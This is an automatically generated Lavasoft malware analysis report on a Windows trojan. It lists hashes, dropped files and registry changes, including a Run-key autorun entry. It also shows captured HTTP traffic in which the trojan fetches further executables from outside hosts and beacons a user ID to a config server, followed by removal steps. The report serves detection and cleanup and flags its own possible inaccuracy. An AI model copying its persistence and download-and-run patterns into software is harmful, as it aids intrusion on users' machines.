Trojan.GenericKD.4404831_a2029b6ffc
HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.GenericKD.4404831 (B) (Emsisoft), Trojan.GenericKD.4404831 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: a2029b6ffc8fa95119c266c44e8bcc9d
SHA1: 862f13010676bfc6d96997a82450d96254f1ce5e
SHA256: 1fdd14816d281f56c3eb3ae15e35420e89a3717a0efef52b42752773b8ee3691
SSDeep: 49152:hMTwFS8hjz4bDnlrp/7/cO0AGvS5RCUGe:MRCU
Size: 2407936 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: Search Module Ltd.
Created at: 2017-02-15 13:06:45
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:3964
ShVCt4TyZb.exe:3668
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:3964 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ShVCt4TyZb.exe (63001 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ShVCt4TyZbSXmx5SRn4r.exe (43686 bytes)
The process ShVCt4TyZb.exe:3668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (37 bytes)
Registry activity
The process %original file name%.exe:3964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\CasterDate]
"date" = "14/03/2017"
[HKLM\SOFTWARE\Microsoft\Tracing\a2029b6ffc8fa95119c266c44e8bcc9d_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\a2029b6ffc8fa95119c266c44e8bcc9d_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\a2029b6ffc8fa95119c266c44e8bcc9d_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\wewewe]
"partner" = "tuto"
"Product" = "diskpower"
[HKLM\SOFTWARE\Microsoft\Tracing\a2029b6ffc8fa95119c266c44e8bcc9d_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\wewewe]
"channel" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\a2029b6ffc8fa95119c266c44e8bcc9d_RASAPI32]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\a2029b6ffc8fa95119c266c44e8bcc9d_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\a2029b6ffc8fa95119c266c44e8bcc9d_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\a2029b6ffc8fa95119c266c44e8bcc9d_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\a2029b6ffc8fa95119c266c44e8bcc9d_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\a2029b6ffc8fa95119c266c44e8bcc9d_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\a2029b6ffc8fa95119c266c44e8bcc9d_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process ShVCt4TyZb.exe:3668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\ShVCt4TyZb_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ShVCt4TyZb_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\ShVCt4TyZb_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ShVCt4TyZb_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ShVCt4TyZb_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\ShVCt4TyZb_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\ShVCt4TyZb_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\ShVCt4TyZb_RASMANCS]
"FileDirectory" = "%windir%\tracing"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"26QROWG5JJ" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ShVCt4TyZb.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| 6372344ac817305964e0b5776bf69137 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\ShVCt4TyZb.exe |
| 28b8705b42a49a6a45270618d855059a | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\ShVCt4TyZbSXmx5SRn4r.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name: 3UOB7KSTU
Product Version: 3.7.5.1
Legal Copyright: Copyright (c) 3916
Legal Trademarks:
Original Filename: Ik76tttZ.exe
Internal Name: Ik76tttZ.exe
File Version: 3.7.5.1
File Description: 3UOB7KST
Comments: 3UOB7
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 2160032 | 2160128 | 4.16928 | d1ba8e7345f00a75c3117e91df1cda34 |
| .rsrc | 2170880 | 246320 | 246784 | 4.77166 | f5a33259a79e6e3c7acb742dcf36a83a |
| .reloc | 2424832 | 12 | 512 | 0.070639 | 51d7087be747d77035adf1496d5d6560 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://asiasoftwaretools.com/get/4/remote.exe | |
| hxxp://asiasoftwaretools.com/get/3/wizzcaster_v2.exe | |
| hxxp://wizzcaster.com/api/v5/config | |
| hxxp://wizzcaster.com/api/v5/link | |
| teredo.ipv6.microsoft.com | |
| dns.msftncsi.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
GET /get/3/wizzcaster_v2.exe HTTP/1.1
Host: asiasoftwaretools.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 14 Mar 2017 13:29:13 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownloade0000..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...F..X.........."...0..$..........VB... ...`....@.. .................
......`............@..................................B..O....`.......
................@.......@.............................................
.. ............... ..H............text...\"... ...$..................
..`.rsrc........`.......&..............@..@.reloc.......@.............
.........@..B................8B......H....... $..............,7.......
........................................(....(....*.r...p*..0..>...
....r/..p(......(......!...%..|.o.........(.......(....(....(....*...0
..C.......r...p(......~....o..........o......r...po.......#....o.....r
...po..... .....#....o.....r...po.......'....o.....r...po.......(....o
.....r!..po.....(.....(....o......!...%..,.o......(.....o.....r'..po..
...(.....(....o......!...%..,.o......(.....o.....r/..p~....o..........
.o....t......o .....o!...("....(.........io#...o....*..0..k........(..
...s$......(%........i.Yo&....,......jo'.....s(.........io)...&...,..o
*....(.....o.........,..o*......*.......7..E..........Q^.......0..3...
.........( ...rO..po,..........%...%.(.....o....&..&..*.........//....
........( ...rs..po,..........%...o....&*..(....(....%-.r...ps-...z...
....%...o....&*..0..&.......(.....o/.....s0...%o1.....o2...o3....*..(4
...*.~....-.r...p.....( ...o5...s6........~....*.~....*.......*.~....*
..(7...*Vs....(8...t.........*......( ...r...po,..........%...o...<<< skipped >>>
GET /get/4/remote.exe HTTP/1.1
Host: asiasoftwaretools.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 14 Mar 2017 13:29:13 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="remote.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownloada0e00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...S..X.........."...0..2...........P... ...`....@.. .................
......`............@.................................DP..O....`.......
................@.......O.............................................
.. ............... ..H............text....0... ...2..................
..`.rsrc........`.......4..............@..@.reloc.......@.............
.........@..B................xP......H....... $..............,7.......
........................................(....(....*.r...p*..0..>...
....r/..p(......(......!...%..|.o.........(.......(....(....(....*...0
..C.......r...p(......~....o..........o......r...po.......#....o.....r
...po..... .....#....o.....r...po.......'....o.....r...po.......(....o
.....r!..po.....(.....(....o......!...%..,.o......(.....o.....r'..po..
...(.....(....o......!...%..,.o......(.....o.....r/..p~....o..........
.o....t......o .....o!...("....(.........io#...o....*..0..k........(..
...s$......(%........i.Yo&....,......jo'.....s(.........io)...&...,..o
*....(.....o.........,..o*......*.......7..E..........Q^.......0..3...
.........( ...rO..po,..........%...%.(.....o....&..&..*.........//....
........( ...rs..po,..........%...o....&*..(....(....%-.r...ps-...z...
....%...o....&*..0..&.......(.....o/.....s0...%o1.....o2...o3....*..(4
...*.~....-.r...p.....( ...o5...s6........~....*.~....*.......*.~....*
..(7...*Vs....(8...t.........*......( ...r...po,..........%...o...<<< skipped >>>
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Tue, 14 Mar 2017 13:29:21 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=ec792a75e8ba0655541b8f48dad7627ac825ac04; expires=Tue, 14-Mar-2017 15:29:21 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Tue, 14 Mar 2017 13
:29:21 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=ec792a75e8ba0655541b8f48dad7627ac825ac04; e
xpires=Tue, 14-Mar-2017 15:29:21 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}....
POST /api/v5/link HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 17
Expect: 100-continue
HTTP/1.1 100 Continue
....
uid=57a764d042bf8
HTTP/1.1 200 OK
Date: Tue, 14 Mar 2017 13:29:23 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=a8acae278fed2daa7fcd9526565bcf7079e9c1c2; expires=Tue, 14-Mar-2017 15:29:23 GMT; Max-Age=7200; path=/; httponly
Content-Length: 67
Content-Type: text/html; charset=UTF-8{"link":"http:\/\/bestoffersfortoday.com\/redirect\/57a764d042bf8"}HTT
P/1.1 200 OK..Date: Tue, 14 Mar 2017 13:29:23 GMT..Server: Apache/2.4.
10 (Debian)..Cache-Control: no-cache..Set-Cookie: laravel_session=a8ac
ae278fed2daa7fcd9526565bcf7079e9c1c2; expires=Tue, 14-Mar-2017 15:29:2
3 GMT; Max-Age=7200; path=/; httponly..Content-Length: 67..Content-Typ
e: text/html; charset=UTF-8..{"link":"http:\/\/bestoffersfortoday.com\
/redirect\/57a764d042bf8"}..
The Trojan connects to the servers at the folowing location(s):
0/4/ /$/
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ShVCt4TyZb.exe (63001 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ShVCt4TyZbSXmx5SRn4r.exe (43686 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (37 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"26QROWG5JJ" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ShVCt4TyZb.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.